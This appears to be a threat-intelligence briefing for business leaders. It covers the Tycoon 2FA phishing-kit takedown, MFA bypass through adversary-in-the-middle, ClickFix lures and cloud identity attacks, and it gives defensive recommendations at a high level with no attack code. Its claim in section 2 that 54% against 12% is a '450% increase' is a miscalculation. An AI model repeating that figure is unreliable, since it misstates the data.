In today’s cybersecurity landscape, organizations are no longer facing isolated individuals but rather a highly specialized and scalable fraud economy. The latest threat intelligence reports reveal that attackers’ objectives have fundamentally changed: today, adversaries are no longer trying to “break into” systems—they are simply trying to “log in.”
1. Tycoon 2FA: the factory of stolen identities
The recent takedown of Tycoon 2FA by a coalition led by Microsoft and Europol offers a unique glimpse into modern cybercriminal sophistication. This platform operated under the “Phishing-as-a-Service” (PhaaS) model, enabling criminals with little technical expertise to launch large-scale attacks.
What made Tycoon 2FA particularly dangerous was its ability to bypass multi-factor authentication (MFA). Using a technique known as Adversary-in-the-Middle (AiTM), the kit intercepted security codes and session tokens in real time, allowing attackers to access protected Microsoft 365 or Gmail accounts without triggering alarms. At its peak, this network impacted more than 500,000 organizations every month.
2. The end of obvious deception: AI and ClickFix
Artificial intelligence has transformed phishing from poorly written emails into a precision-engineered attack tool. AI-assisted campaigns now achieve click-through rates of 54%, compared to 12% for traditional methods—representing a 450% increase in attack effectiveness.
In addition, a new dominant tactic called ClickFix has emerged. This method accounts for 47% of recently observed initial access attempts. Instead of requesting a password, it tricks users into copying and pasting a “support code” or “update” directly into the Windows Run command window (Win + R). By doing so, employees unknowingly execute malware themselves, allowing it to load directly into system memory and evade traditional antivirus solutions.
3. Identity as the new perimeter
While 99% of identity-based attacks can be blocked through the use of MFA, the industrialization of tools such as Tycoon 2FA is forcing organizations to raise the bar. The trend is clear: identity — not infrastructure — is now the primary target.
Organizations are experiencing a shift in the nature of security breaches:
- Hybrid attacks: 40% of ransomware attacks now involve hybrid components, where attackers use compromised identities to pivot from on-premises servers into Azure cloud environments.
- Workload identities: As employee security improves, criminals are increasingly targeting “machine identities,” such as applications and scripts with elevated privileges but weak security controls.
- Speed of impact: Attacker dwell times continue to shrink. In 46% of incidents, intrusions are detected in less than 48 hours, demanding near-instant response capabilities.
4. Emerging threats: from deepfakes to infiltrators
The threat ecosystem has diversified with state-sponsored actors and new forms of fraud:
- Technical support deepfakes: Scammers now use AI-generated voices to impersonate technical support agents in phone calls or Microsoft Teams meetings, dramatically increasing victim trust.
- The remote worker challenge: A growing trend has been identified involving IT workers sponsored by nation-states infiltrating legitimate companies using false identities to generate revenue or conduct espionage.
- Cloud attacks: Destructive campaigns targeting cloud environments — such as mass deletion of Azure data — have increased by 87% over the past year.
5. Strategic recommendations for leadership
Cybersecurity is no longer just a technical issue; it is a business continuity risk that must be managed at the board level. To navigate this environment, we recommend:
- Adopt phishing-resistant MFA: Traditional methods (such as SMS or basic push notifications) are no longer sufficient. Organizations should migrate to standards such as FIDO2 or Windows Hello for Business, which cannot be intercepted by AiTM kits.
- Achieve full visibility: What cannot be seen cannot be defended. It is critical to inventory not only physical assets but also every application, API, and cloud service with access to company data.
- Build a culture of vigilance: Since attackers increasingly rely on human deception tactics like ClickFix, employee training must evolve from theory-based awareness to practical simulations and the promotion of a culture where reporting suspicious activity is encouraged and rewarded.
Conclusion
Although the threat landscape appears increasingly challenging, the successful disruption of networks such as Tycoon 2FA demonstrates that global collaboration and intelligence-driven defense remain powerful tools. Cyber resilience is not about preventing every attack — it is about being prepared to withstand, recover, and adapt at the same speed as our adversaries.
Sources: Microsoft On the Issues. (2026). Defending the gates: How a global coalition disrupted Tycoon 2FA, a major driver of initial access and large-scale online impersonation; Microsoft Security Blog. (2026). Inside Tycoon2FA: How a leading AiTM phishing kit operated at scale; Microsoft Threat Intelligence. (2025). Microsoft Digital Defense Report 2025: Lighting the path to a secure future.